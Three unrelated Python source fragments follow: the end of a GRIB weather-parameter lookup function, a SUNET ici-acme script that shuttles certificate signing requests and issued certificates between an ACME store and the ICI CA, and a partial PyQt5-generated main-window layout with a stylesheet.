return 'FFG-MS'
if table2Version == 203 and indicatorOfParameter == 24:
return 'V-MS'
if table2Version == 203 and indicatorOfParameter == 23:
return 'U-MS'
if table2Version == 203 and indicatorOfParameter == 22:
return 'DF-MS'
if table2Version == 203 and indicatorOfParameter == 21:
return 'FF-MS'
if table2Version == 203 and indicatorOfParameter == 20:
return 'DD-D'
if table2Version == 203 and indicatorOfParameter == 19:
return 'FOGSYM-N'
if table2Version == 203 and indicatorOfParameter == 18:
return 'FRNTSYM-N'
if table2Version == 203 and indicatorOfParameter == 15:
return 'CLDSYM-N'
if table2Version == 203 and indicatorOfParameter == 13:
return 'RH-PRCNT'
if table2Version == 203 and indicatorOfParameter == 12:
return 'Q-KGKG'
if table2Version == 203 and indicatorOfParameter == 10:
return 'TD-C'
if table2Version == 203 and indicatorOfParameter == 9:
return 'TPW-K'
if table2Version == 203 and indicatorOfParameter == 8:
return 'TP-K'
if table2Version == 203 and indicatorOfParameter == 4:
return 'T-C'
if table2Version == 203 and indicatorOfParameter == 3:
return 'HL-M'
if table2Version == 203 and indicatorOfParameter == 2:
return 'Z-M2S2'
if table2Version == 203 and indicatorOfParameter == 1:
return 'P-HPA'
return wrapped
|
<reponame>SUNET/ici-acme
#!/usr/bin/env python3
#
# Copyright 2019 SUNET. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are
# permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of
# conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list
# of conditions and the following disclaimer in the documentation and/or other materials
# provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY SUNET ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL SUNET OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are those of the
# authors and should not be interpreted as representing official policies, either expressed
# or implied, of SUNET.
#
# Author : <NAME> <<EMAIL>>
#
"""
Monitor the ici-acme store for CSRs and pass them to the ICI CA. Monitor results from ICI
and put the generated certificates back into the ici-acme store.
"""
import argparse
import logging
import logging.handlers
import os
import sys
import inotify.adapters
import yaml
from inotify.constants import IN_MODIFY, IN_MOVED_TO
# Built-in defaults for every command line option.  parse_args() feeds these
# straight into argparse as defaults, so each value can be overridden on the
# command line.  'timeout' (seconds) is the intended no-event poll interval
# (the actual polling is still a TODO in main()).
_defaults = {'syslog': True,
             'debug': False,
             'store_dir': os.path.join(os.getcwd(), 'data/certificate'),
             'ici_input_dir': '/var/lib/ici/example/requests/server',
             'ici_output_dir': '/var/lib/ici/example/out-certs',
             'cert_chain': '/var/lib/ici/example/ca.crt',
             'timeout': 60,
             }
def parse_args(defaults):
    """Parse command line arguments.

    :param defaults: dict supplying the default value for every option
    :return: the populated argparse.Namespace
    """
    parser = argparse.ArgumentParser(description = 'ICI <-> ICI-ACME interface',
                                     add_help = True,
                                     formatter_class = argparse.ArgumentDefaultsHelpFormatter,
                                     )
    # Value-taking options: (dest, metavar, type, help text).
    # Declared in this order so --help lists them the same way as before.
    value_options = (
        ('store_dir', 'DIR', str, 'ICI-ACME store directory to monitor'),
        ('ici_input_dir', 'DIR', str, 'ICI-CA input directory (where to put CSRs)'),
        ('ici_output_dir', 'DIR', str, 'ICI-CA output directory (where to get certificates)'),
        ('cert_chain', 'FILE', str, 'File with ICI CA cert'),
        ('timeout', 'SECONDS', int, 'Re-check files at least this often'),
    )
    for dest, metavar, value_type, help_text in value_options:
        parser.add_argument('--' + dest,
                            dest = dest,
                            metavar = metavar, type = value_type,
                            default = defaults[dest],
                            help = help_text,
                            )
    # Boolean flags: store_true with the default taken from *defaults*
    # (so a flag defaulting to True cannot be turned off here).
    flag_options = (
        ('debug', 'Enable debug operation'),
        ('syslog', 'Enable syslog output'),
    )
    for dest, help_text in flag_options:
        parser.add_argument('--' + dest,
                            dest = dest,
                            action = 'store_true', default = defaults[dest],
                            help = help_text,
                            )
    return parser.parse_args()
def init_logger(myname, args):
    """Configure logging and return a logger named *myname*.

    Honours args.debug (root level DEBUG instead of INFO) and args.syslog
    (attach an additional SysLogHandler to the returned logger).
    """
    # Root log level for basicConfig's stderr handler.
    root_level = logging.DEBUG if args.debug else logging.INFO
    logging.basicConfig(level = root_level, stream = sys.stderr,
                        format='%(asctime)s: %(name)s: %(levelname)s %(message)s')
    logger = logging.getLogger(myname)
    # When stderr is not a TTY (and we are not debugging), raise the level of
    # the root handlers (the StreamHandler installed above) to WARNING so
    # non-interactive runs stay quiet on stderr.
    if not (sys.stderr.isatty() or args.debug):
        for handler in logging.getLogger('').handlers:
            handler.setLevel(logging.WARNING)
    if args.syslog:
        syslog_handler = logging.handlers.SysLogHandler()
        syslog_handler.setFormatter(
            logging.Formatter('%(name)s: %(levelname)s %(message)s'))
        logger.addHandler(syslog_handler)
    return logger
def main(args, logger):
    """Shuttle CSRs and certificates between the ici-acme store and the ICI CA.

    Watches two directories with inotify:

      * args.store_dir (IN_MOVED_TO): new ``*.yaml`` request files.  When such
        a file holds a ``csr`` but no ``certificate`` yet, the CSR is wrapped
        in PEM markers and written to args.ici_input_dir for the CA to sign.
      * args.ici_output_dir (IN_MODIFY): ``*.pem`` certificates produced by
        the CA.  Each one is written back into the matching ``*.yaml`` store
        file, together with the CA chain read from args.cert_chain (if set).

    :return: False if the event loop ever terminates (mapped to exit status 1)
    """
    i = inotify.adapters.Inotify()
    # construct mask by or-ing constants
    i.add_watch(args.store_dir, mask=(IN_MOVED_TO))
    i.add_watch(args.ici_output_dir, mask=(IN_MODIFY))
    logger.info(f'Waiting for file system events under {args.store_dir} and {args.ici_output_dir}')
    # Store filenames this script itself just rewrote; the next event for such
    # a file is dropped so we do not re-process our own modification.
    ignore_store_events = {}
    for event in i.event_gen(yield_nones = True):
        if event is None:
            # Whenever there are no events for args.timeout seconds, we poll
            # the files to make sure we didn't miss anything
            # TODO: implement this
            continue
        (_header, type_names, path, filename) = event
        # BUGFIX: this previously used {repr(type_names)!r}, applying repr()
        # twice and logging the quoted repr of a repr string.
        logger.debug(f'Received file system event: path={repr(path)} fn={repr(filename)}, types={type_names!r}')
        if path == args.store_dir and filename.endswith('.yaml'):
            if ignore_store_events.pop(filename, False):
                # The event was generated because this script modified the file
                continue
            store_fn = os.path.join(path, filename)
            with open(store_fn, 'r') as fd:
                data = yaml.safe_load(fd.read())
            if 'csr' in data and data.get('certificate') is None:
                logger.info(f'Processing CSR in file {store_fn}')
                cert_id = filename.split('.')[0]
                out_fn = os.path.join(args.ici_input_dir, cert_id + '.csr')
                with open(out_fn, 'w') as out:
                    out.write('-----BEGIN CERTIFICATE REQUEST-----\n' +
                              data['csr'] + '\n' +
                              '-----END CERTIFICATE REQUEST-----\n')
                logger.info(f'Wrote CSR from request {cert_id}.csr to file {out_fn}')
        elif path == args.ici_output_dir and filename.endswith('.pem'):
            cert_fn = os.path.join(path, filename)
            logger.info(f'Processing certificate in file {cert_fn}')
            with open(cert_fn, 'r') as fd:
                cert_data = fd.read()
            cert_id = filename.split('.')[0]
            store_fn = os.path.join(args.store_dir, cert_id + '.yaml')
            if not os.path.isfile(store_fn):
                logger.error(f'Could not find ici-acme store certificate: {store_fn}')
                continue
            cert_chain = None
            if args.cert_chain:
                with open(args.cert_chain, 'r') as fd:
                    cert_chain = [fd.read()]
            with open(store_fn, 'r') as fd:
                data = yaml.safe_load(fd.read())
            if data.get('certificate') is not None:
                # Deliberately overwrite anyway (keeps the store current), but
                # log it since it usually indicates a duplicate event.
                logger.error(f'There is already a certificate in file {store_fn}')
            data['certificate'] = cert_data
            data['cert_chain'] = cert_chain
            # Mark before writing so the resulting inotify event is ignored.
            ignore_store_events[filename] = True
            with open(store_fn, 'w') as fd:
                fd.write(yaml.safe_dump(data))
            logger.debug(f'Saved certificate in ici-acme store file {store_fn}')
    return False
if __name__ == '__main__':
    try:
        progname = os.path.basename(sys.argv[0])
        args = parse_args(_defaults)
        logger = init_logger(progname, args)
        res = main(args, logger)
        # Map main()'s return value to a conventional exit status:
        # True -> 0 (success), False -> 1 (failure), anything else is
        # interpreted as a numeric exit code.  The identity checks must come
        # first, since int(True) == 1 would otherwise invert the meaning.
        if res is True:
            sys.exit(0)
        if res is False:
            sys.exit(1)
        sys.exit(int(res))
    except KeyboardInterrupt:
        # Ctrl-C is the normal way to stop the monitor; exit cleanly.
        sys.exit(0)
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'C:\Python projects\DPR\Source\GUI.ui'
#
# Created by: PyQt5 UI code generator 5.11.3
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
    def setupUi(self, MainWindow):
        """Build the main window widget tree.

        Generated by pyuic5 from GUI.ui ("all changes will be lost" on
        regeneration) -- comments here are for orientation only, not for
        hand-editing.

        NOTE(review): MplWidget (used for graphicsView_1/graphicsView_2) is a
        promoted custom widget; pyuic5 normally emits its import at the bottom
        of the generated file -- confirm it is present there.
        """
        MainWindow.setObjectName("MainWindow")
        MainWindow.resize(1011, 701)
        icon = QtGui.QIcon()
        icon.addPixmap(QtGui.QPixmap("icon.ico"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        MainWindow.setWindowIcon(icon)
        # Application-wide stylesheet: light theme for group boxes, tab bar,
        # buttons, date edits, combo boxes, progress bars, tables and headers.
        MainWindow.setStyleSheet("/* QGroupBox -------------------------------------------------------------- */\n"
"QGroupBox {\n"
"    font-weight: bold;\n"
"    border: 2px solid #DCDCDC;\n"
"    border-radius: 4px;\n"
"    padding: 4px;\n"
"    margin-top: 16px;\n"
"    background-color: #F7FBFD\n"
"}\n"
"\n"
"QGroupBox::title {\n"
"    subcontrol-origin: margin;\n"
"    subcontrol-position: top left;\n"
"    left: 3px;\n"
"    padding-left: 3px;\n"
"    padding-right: 5px;\n"
"    padding-top: 8px;\n"
"    padding-bottom: 16px;\n"
"}\n"
"\n"
"QGroupBox#groupBox_7 {\n"
"    background-color: #B2D5EE;\n"
"    border: 2px solid #52636E;\n"
"    color: #000000;\n"
"    border-radius: 4px;\n"
"    outline: none;\n"
"}\n"
"\n"
"/* QTabBar -------------------------------------------------------------- */\n"
"QTabBar::tab:top {\n"
"    background-color: #E1E1E1;\n"
"    color: #000000;\n"
"    margin-left: 2px;\n"
"    min-width: 5px;\n"
"    border-bottom: 3px solid #E1E1E1;\n"
"    padding-left: 4px;\n"
"    padding-right: 4px;\n"
"    padding-top: 2px;\n"
"    padding-bottom: 2px;\n"
"    border-top-left-radius: 3px;\n"
"    border-top-right-radius: 3px;\n"
"    border: 1px solid #DCDCDC;\n"
"}\n"
"\n"
"QTabBar::tab:top:selected {\n"
"    background-color: #FFFFFF;\n"
"    color: #000000;\n"
"    border-bottom: 3px solid #FFFFFF;\n"
"    border-top-left-radius: 3px;\n"
"    border-top-right-radius: 3px;\n"
"}\n"
"\n"
"QTabBar::tab:top:!selected:hover {\n"
"    background-color: #E5F1FB;\n"
"    border: 1px solid #DCDCDC;\n"
"}\n"
"\n"
"/* QTabWiget -------------------------------------------------------------- */\n"
"QTabWidget::pane {\n"
"    border: 2px solid #7e99b4;\n"
"    border-radius: 4px;\n"
"    margin: 0px;\n"
"    background-color: #E6EFF4;\n"
"}\n"
"\n"
"/* QPushButton -------------------------------------------------------------- */\n"
"QPushButton {\n"
"    background-color: #E1E1E1;\n"
"    border: 1px solid #ADADAD;\n"
"    color: #000000;\n"
"    border-radius: 4px;\n"
"    outline: none;\n"
"}\n"
"\n"
"QPushButton:hover,\n"
"QPushButton:checked:hover{\n"
"    border: 1px solid #0078D7;\n"
"    background-color: #E5F1FB;\n"
"    color: #000000;\n"
"}\n"
"\n"
"QPushButton:pressed {\n"
"    background-color: #CCE4F7;\n"
"    border: 1px solid #00559B;\n"
"    color: #000000;\n"
"}\n"
"\n"
"QPushButton:disabled {\n"
"    background-color: #E1E1E1;\n"
"    border: 1px solid #ADADAD;\n"
"    color: #787878;\n"
"    border-radius: 4px;\n"
"    outline: none;\n"
"}\n"
"\n"
"/* QDateEdit-------------------------------------------------------------- */\n"
"QDateEdit {\n"
"    background-color: white;\n"
"    selection-background-color: #1464A0;\n"
"    border-style: solid;\n"
"    border: 1px solid #7A7A7A;\n"
"    border-radius: 4px;\n"
"    padding-top: 2px; /* This fix #103, #111*/\n"
"    padding-bottom: 2px; /* This fix #103, #111*/\n"
"    padding-left: 4px;\n"
"    padding-right: 4px;\n"
"    min-width: 10px;\n"
"}\n"
"\n"
"QDateEdit:hover {\n"
"    border-style: solid;\n"
"    border: 1px solid #000000;\n"
"}\n"
"\n"
"\n"
"QDateEdit::drop-down {\n"
"    border-top-right-radius: 3px;\n"
"    border-bottom-right-radius: 3px;\n"
"}\n"
"\n"
"\n"
"QDateEdit::down-arrow {\n"
"    image: url(down_arrow.png);\n"
"}\n"
"\n"
"QDateEdit::down-arrow:on,\n"
"QDateEdit::down-arrow:hover,\n"
"QDateEdit::down-arrow:focus {\n"
"    image: url(down_arrow.png);\n"
"}\n"
"\n"
"QDateEdit QAbstractItemView {\n"
"    background-color: #FFFFFF;\n"
"    border-radius: 4px;\n"
"    border-style: solid;\n"
"    border: 1px solid #DCDCDC;\n"
"    selection-background-color: #0078D7;\n"
"}\n"
"\n"
"QDateEdit QAbstractItemView:hover {\n"
"    background-color: #FFFFFF;\n"
"    border-radius: 4px;\n"
"    border-style: solid;\n"
"    border: 1px solid #0078D7;\n"
"    selection-background-color: #0078D7;\n"
"}\n"
"\n"
"QDateEdit QCalendarWidget {\n"
"    background-color: #FFFFFF;\n"
"}\n"
"\n"
"QLineEdit {\n"
"    background-color: #FFFFFF;\n"
"    border-style: solid; /* without this border reverts for disabled */\n"
"    border: 1px solid #7A7A7A;\n"
"    color: #000000;\n"
"    border-radius: 4px;\n"
"    outline: none;\n"
"}\n"
"\n"
"QLineEdit:hover{\n"
"    border: 1px solid #000000;\n"
"    background-color: #FFFFFF;\n"
"    color: #000000;\n"
"}\n"
"\n"
"/* QCombobox -------------------------------------------------------------- */\n"
"QComboBox {\n"
"    background-color: #E1E1E1;\n"
"    border: 1px solid #ADADAD;\n"
"    color: #000000;\n"
"    border-radius: 4px;\n"
"    outline: none;\n"
"}\n"
"\n"
"QComboBox:hover,\n"
"QComboBox:checked:hover{\n"
"    border: 1px solid #0078D7;\n"
"    background-color: #E5F1FB;\n"
"    color: #000000;\n"
"}\n"
"\n"
"QComboBox::drop-down \n"
"{\n"
"    border: 0px;\n"
"}\n"
"\n"
"\n"
"QComboBox::down-arrow {\n"
"    image: url(down_arrow.png);\n"
"}\n"
"\n"
"QComboBox::down-arrow:on,\n"
"QComboBox::down-arrow:hover,\n"
"QComboBox::down-arrow:focus {\n"
"    image: url(down_arrow.png);\n"
"}\n"
"\n"
"QComboBox QAbstractItemView {\n"
"    background: #E5F1FB;\n"
"    border-radius: 4px;\n"
"    border: 1px solid #F7FFF7;\n"
"    selection-color: #000000;\n"
"    selection-background-color: #CCE4F7;\n"
"}\n"
"\n"
"/* QProgressBar ----------------------------------------------------------- */\n"
"QProgressBar {\n"
"    background-color: #E6E6E6;\n"
"    border: 1px solid #BCBCBC;\n"
"    color: #000000;\n"
"    border-radius: 4px;\n"
"    text-align: center;\n"
"}\n"
"\n"
"QProgressBar::chunk {\n"
"    background-color: #EFC649;\n"
"    /*default background-color: #06B025;*/\n"
"    color: #000000;\n"
"    border-radius: 4px;\n"
"}\n"
"\n"
"/* QTableView -------------------------------------------------------------- */\n"
"QListView,\n"
"QTreeView,\n"
"QTableView,\n"
"QColumnView {\n"
"    background-color: #FFFFFF;\n"
"    border: 1.5px solid #DCDCDC;\n"
"    color: #000000;\n"
"    gridline-color: #F0F0F0;\n"
"    border-radius: 4px;\n"
"}\n"
"\n"
"QListView:hover,\n"
"QTreeView::hover,\n"
"QTableView::hover,\n"
"QColumnView::hover {\n"
"    background-color: #FFFFFF;\n"
"    border: 1px solid #0078D7;\n"
"}\n"
"\n"
"\n"
"QHeaderView {\n"
"    background-color: #E1E1E1;\n"
"    border: 0px transparent #E1E1E1;\n"
"    padding: 0px;\n"
"    margin: 0px;\n"
"    border-radius: 0px;\n"
"}\n"
"\n"
"\n"
"QHeaderView::section {\n"
"    background-color: #E1E1E1;\n"
"    color: #000000;\n"
"    padding: 2px;\n"
"    border-radius: 0px;\n"
"    text-align: left;\n"
"}\n"
"\n"
"QHeaderView::section:checked {\n"
"    color: #000000;\n"
"    background-color: #BCDCF4;\n"
"}\n"
"\n"
"\n"
"QHeaderView::section::vertical::first,\n"
"QHeaderView::section::vertical::only-one {\n"
"    border-top: 1px solid #ADADAD;\n"
"}\n"
"\n"
"QHeaderView::section::vertical {\n"
"    border-top: 1px solid #ADADAD;\n"
"}\n"
"\n"
"QHeaderView::section::horizontal::first,\n"
"QHeaderView::section::horizontal::only-one {\n"
"    border-left: 1px solid #ADADAD;\n"
"}\n"
"\n"
"QHeaderView::section::horizontal {\n"
"    border-left: 1px solid #ADADAD;\n"
"}\n"
"\n"
"QScrollBar:vertical {\n"
"    background-color: #E1E1E1;\n"
"    border: 1px solid #ADADAD;\n"
"}\n"
"\n"
"QScrollBar:horizontal {\n"
"    background-color: #E1E1E1;\n"
"    border: 1px solid #ADADAD;\n"
"}")
        MainWindow.setUnifiedTitleAndToolBarOnMac(False)
        # --- Central widget and the main tab container ---
        self.centralwidget = QtWidgets.QWidget(MainWindow)
        self.centralwidget.setObjectName("centralwidget")
        self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)
        self.tabWidget.setGeometry(QtCore.QRect(10, 70, 991, 611))
        self.tabWidget.setStyleSheet("")
        self.tabWidget.setObjectName("tabWidget")
        # --- Tab 1 ("Data Points"): inputs, progress bar, chart and table ---
        self.tab = QtWidgets.QWidget()
        self.tab.setObjectName("tab")
        self.progressBar_1 = QtWidgets.QProgressBar(self.tab)
        self.progressBar_1.setGeometry(QtCore.QRect(290, 230, 118, 23))
        self.progressBar_1.setStyleSheet("")
        self.progressBar_1.setProperty("value", 0)
        self.progressBar_1.setObjectName("progressBar_1")
        self.pushButton_2 = QtWidgets.QPushButton(self.tab)
        self.pushButton_2.setGeometry(QtCore.QRect(20, 230, 75, 23))
        self.pushButton_2.setStyleSheet("")
        self.pushButton_2.setObjectName("pushButton_2")
        self.groupBox = QtWidgets.QGroupBox(self.tab)
        self.groupBox.setGeometry(QtCore.QRect(10, 0, 401, 221))
        self.groupBox.setStyleSheet("")
        self.groupBox.setObjectName("groupBox")
        self.label_1 = QtWidgets.QLabel(self.groupBox)
        self.label_1.setGeometry(QtCore.QRect(20, 30, 141, 21))
        self.label_1.setObjectName("label_1")
        self.groupBox_2 = QtWidgets.QGroupBox(self.groupBox)
        self.groupBox_2.setGeometry(QtCore.QRect(10, 90, 381, 121))
        self.groupBox_2.setStyleSheet("")
        self.groupBox_2.setObjectName("groupBox_2")
        self.radioButton_1 = QtWidgets.QRadioButton(self.groupBox_2)
        self.radioButton_1.setGeometry(QtCore.QRect(20, 30, 221, 17))
        self.radioButton_1.setStyleSheet("")
        self.radioButton_1.setObjectName("radioButton_1")
        self.radioButton_2 = QtWidgets.QRadioButton(self.groupBox_2)
        self.radioButton_2.setGeometry(QtCore.QRect(20, 60, 221, 17))
        self.radioButton_2.setStyleSheet("")
        self.radioButton_2.setObjectName("radioButton_2")
        self.radioButton_3 = QtWidgets.QRadioButton(self.groupBox_2)
        self.radioButton_3.setGeometry(QtCore.QRect(20, 90, 231, 17))
        self.radioButton_3.setObjectName("radioButton_3")
        self.label_2 = QtWidgets.QLabel(self.groupBox)
        self.label_2.setGeometry(QtCore.QRect(20, 60, 131, 21))
        self.label_2.setObjectName("label_2")
        self.groupBox_3 = QtWidgets.QGroupBox(self.tab)
        self.groupBox_3.setGeometry(QtCore.QRect(430, 0, 541, 61))
        self.groupBox_3.setStyleSheet("")
        self.groupBox_3.setObjectName("groupBox_3")
        self.lineEdit_2 = QtWidgets.QLineEdit(self.groupBox_3)
        self.lineEdit_2.setGeometry(QtCore.QRect(100, 30, 81, 20))
        self.lineEdit_2.setStyleSheet("")
        self.lineEdit_2.setReadOnly(True)
        self.lineEdit_2.setObjectName("lineEdit_2")
        self.lineEdit = QtWidgets.QLineEdit(self.groupBox_3)
        self.lineEdit.setGeometry(QtCore.QRect(300, 30, 113, 20))
        self.lineEdit.setStyleSheet("")
        self.lineEdit.setReadOnly(True)
        self.lineEdit.setObjectName("lineEdit")
        self.label = QtWidgets.QLabel(self.groupBox_3)
        self.label.setGeometry(QtCore.QRect(20, 30, 71, 21))
        self.label.setObjectName("label")
        self.label_8 = QtWidgets.QLabel(self.groupBox_3)
        self.label_8.setGeometry(QtCore.QRect(240, 30, 51, 21))
        self.label_8.setObjectName("label_8")
        self.groupBox_8 = QtWidgets.QGroupBox(self.tab)
        self.groupBox_8.setGeometry(QtCore.QRect(10, 260, 401, 281))
        self.groupBox_8.setStyleSheet("")
        self.groupBox_8.setObjectName("groupBox_8")
        # MplWidget: promoted matplotlib canvas widget (see class docstring note)
        self.graphicsView_1 = MplWidget(self.groupBox_8)
        self.graphicsView_1.setGeometry(QtCore.QRect(0, 20, 401, 261))
        self.graphicsView_1.setStyleSheet("background-color: #F7FBFD")
        self.graphicsView_1.setObjectName("graphicsView_1")
        self.groupBox_9 = QtWidgets.QGroupBox(self.tab)
        self.groupBox_9.setGeometry(QtCore.QRect(430, 70, 541, 471))
        self.groupBox_9.setStyleSheet("")
        self.groupBox_9.setObjectName("groupBox_9")
        self.tableView_1 = QtWidgets.QTableView(self.groupBox_9)
        self.tableView_1.setGeometry(QtCore.QRect(10, 30, 521, 431))
        self.tableView_1.setStyleSheet("")
        self.tableView_1.setObjectName("tableView_1")
        self.dateEdit_1 = QtWidgets.QDateEdit(self.tab)
        self.dateEdit_1.setGeometry(QtCore.QRect(170, 30, 91, 22))
        self.dateEdit_1.setStyleSheet("")
        self.dateEdit_1.setCalendarPopup(True)
        self.dateEdit_1.setObjectName("dateEdit_1")
        self.dateEdit_2 = QtWidgets.QDateEdit(self.tab)
        self.dateEdit_2.setGeometry(QtCore.QRect(170, 60, 91, 22))
        self.dateEdit_2.setStyleSheet("")
        self.dateEdit_2.setCalendarPopup(True)
        self.dateEdit_2.setObjectName("dateEdit_2")
        # Explicit stacking (z-) order for tab 1 widgets
        self.progressBar_1.raise_()
        self.pushButton_2.raise_()
        self.groupBox.raise_()
        self.groupBox_3.raise_()
        self.groupBox_9.raise_()
        self.dateEdit_1.raise_()
        self.dateEdit_2.raise_()
        self.groupBox_8.raise_()
        self.tabWidget.addTab(self.tab, "")
        # --- Tab 2: segmentation inputs, chart and result tables ---
        self.tab_2 = QtWidgets.QWidget()
        self.tab_2.setObjectName("tab_2")
        self.progressBar_2 = QtWidgets.QProgressBar(self.tab_2)
        self.progressBar_2.setGeometry(QtCore.QRect(290, 230, 118, 23))
        self.progressBar_2.setStyleSheet("")
        self.progressBar_2.setMaximum(100)
        self.progressBar_2.setProperty("value", 0)
        self.progressBar_2.setObjectName("progressBar_2")
        self.groupBox_4 = QtWidgets.QGroupBox(self.tab_2)
        self.groupBox_4.setGeometry(QtCore.QRect(10, 0, 401, 221))
        self.groupBox_4.setStyleSheet("")
        self.groupBox_4.setObjectName("groupBox_4")
        self.label_3 = QtWidgets.QLabel(self.groupBox_4)
        self.label_3.setGeometry(QtCore.QRect(20, 30, 161, 21))
        self.label_3.setObjectName("label_3")
        self.lineEdit_3 = QtWidgets.QLineEdit(self.groupBox_4)
        self.lineEdit_3.setGeometry(QtCore.QRect(180, 30, 31, 20))
        self.lineEdit_3.setStyleSheet("")
        self.lineEdit_3.setObjectName("lineEdit_3")
        self.label_4 = QtWidgets.QLabel(self.groupBox_4)
        self.label_4.setGeometry(QtCore.QRect(20, 60, 161, 20))
        self.label_4.setObjectName("label_4")
        self.lineEdit_4 = QtWidgets.QLineEdit(self.groupBox_4)
        self.lineEdit_4.setGeometry(QtCore.QRect(180, 60, 31, 20))
        self.lineEdit_4.setStyleSheet("")
        self.lineEdit_4.setObjectName("lineEdit_4")
        self.groupBox_6 = QtWidgets.QGroupBox(self.groupBox_4)
        self.groupBox_6.setGeometry(QtCore.QRect(10, 90, 381, 121))
        self.groupBox_6.setObjectName("groupBox_6")
        self.radioButton_4 = QtWidgets.QRadioButton(self.groupBox_6)
        self.radioButton_4.setGeometry(QtCore.QRect(20, 35, 21, 21))
        self.radioButton_4.setText("")
        self.radioButton_4.setObjectName("radioButton_4")
        self.radioButton_5 = QtWidgets.QRadioButton(self.groupBox_6)
        self.radioButton_5.setGeometry(QtCore.QRect(20, 80, 21, 21))
        self.radioButton_5.setText("")
        self.radioButton_5.setObjectName("radioButton_5")
        self.label_6 = QtWidgets.QLabel(self.groupBox_6)
        self.label_6.setGeometry(QtCore.QRect(40, 42, 161, 21))
        self.label_6.setObjectName("label_6")
        self.label_14 = QtWidgets.QLabel(self.groupBox_6)
        self.label_14.setGeometry(QtCore.QRect(40, 87, 321, 21))
        self.label_14.setObjectName("label_14")
        self.label_5 = QtWidgets.QLabel(self.groupBox_6)
        self.label_5.setGeometry(QtCore.QRect(40, 28, 171, 21))
        self.label_5.setObjectName("label_5")
        self.label_9 = QtWidgets.QLabel(self.groupBox_6)
        self.label_9.setGeometry(QtCore.QRect(40, 73, 161, 20))
        self.label_9.setObjectName("label_9")
        self.pushButton_3 = QtWidgets.QPushButton(self.tab_2)
        self.pushButton_3.setGeometry(QtCore.QRect(20, 230, 75, 23))
        self.pushButton_3.setStyleSheet("")
        self.pushButton_3.setObjectName("pushButton_3")
        self.groupBox_5 = QtWidgets.QGroupBox(self.tab_2)
        self.groupBox_5.setGeometry(QtCore.QRect(430, 0, 541, 61))
        self.groupBox_5.setStyleSheet("")
        self.groupBox_5.setObjectName("groupBox_5")
        self.label_7 = QtWidgets.QLabel(self.groupBox_5)
        self.label_7.setGeometry(QtCore.QRect(20, 30, 151, 21))
        self.label_7.setObjectName("label_7")
        self.lineEdit_5 = QtWidgets.QLineEdit(self.groupBox_5)
        self.lineEdit_5.setGeometry(QtCore.QRect(180, 30, 31, 20))
        self.lineEdit_5.setStyleSheet("")
        self.lineEdit_5.setReadOnly(True)
        self.lineEdit_5.setObjectName("lineEdit_5")
        self.label_16 = QtWidgets.QLabel(self.groupBox_5)
        self.label_16.setGeometry(QtCore.QRect(270, 30, 81, 21))
        self.label_16.setObjectName("label_16")
        self.lineEdit_6 = QtWidgets.QLineEdit(self.groupBox_5)
        self.lineEdit_6.setGeometry(QtCore.QRect(360, 30, 81, 20))
        self.lineEdit_6.setStyleSheet("")
        self.lineEdit_6.setReadOnly(True)
        self.lineEdit_6.setObjectName("lineEdit_6")
        # Second promoted matplotlib canvas widget
        self.graphicsView_2 = MplWidget(self.tab_2)
        self.graphicsView_2.setGeometry(QtCore.QRect(10, 280, 401, 261))
        self.graphicsView_2.setStyleSheet("background-color: #F7FBFD")
        self.graphicsView_2.setObjectName("graphicsView_2")
        self.pushButton_4 = QtWidgets.QPushButton(self.tab_2)
        self.pushButton_4.setGeometry(QtCore.QRect(880, 550, 75, 23))
        self.pushButton_4.setStyleSheet("")
        self.pushButton_4.setObjectName("pushButton_4")
        self.groupBox_10 = QtWidgets.QGroupBox(self.tab_2)
        self.groupBox_10.setGeometry(QtCore.QRect(10, 260, 401, 281))
        self.groupBox_10.setStyleSheet("")
        self.groupBox_10.setObjectName("groupBox_10")
        self.groupBox_11 = QtWidgets.QGroupBox(self.tab_2)
        self.groupBox_11.setGeometry(QtCore.QRect(430, 70, 541, 471))
        self.groupBox_11.setStyleSheet("")
        self.groupBox_11.setObjectName("groupBox_11")
        self.groupBox_12 = QtWidgets.QGroupBox(self.groupBox_11)
        self.groupBox_12.setGeometry(QtCore.QRect(10, 20, 221, 261))
        self.groupBox_12.setStyleSheet("\n"
"QGroupBox {\n"
"    font-weight: bold;\n"
"    border: 0px solid #DCDCDC;\n"
"    }\n"
"")
        self.groupBox_12.setObjectName("groupBox_12")
        self.tableView_2 = QtWidgets.QTableView(self.groupBox_12)
        self.tableView_2.setGeometry(QtCore.QRect(10, 30, 201, 221))
        self.tableView_2.setStyleSheet("")
        self.tableView_2.setObjectName("tableView_2")
        self.groupBox_13 = QtWidgets.QGroupBox(self.groupBox_11)
        self.groupBox_13.setGeometry(QtCore.QRect(240, 20, 291, 261))
        self.groupBox_13.setStyleSheet("\n"
"QGroupBox {\n"
"    font-weight: bold;\n"
"    border: 0px solid #DCDCDC;\n"
"    }\n"
"")
        self.groupBox_13.setObjectName("groupBox_13")
        self.tableView_4 = QtWidgets.QTableView(self.groupBox_13)
        self.tableView_4.setGeometry(QtCore.QRect(10, 30, 271, 221))
        self.tableView_4.setStyleSheet("")
        self.tableView_4.setObjectName("tableView_4")
        self.groupBox_14 = QtWidgets.QGroupBox(self.groupBox_11)
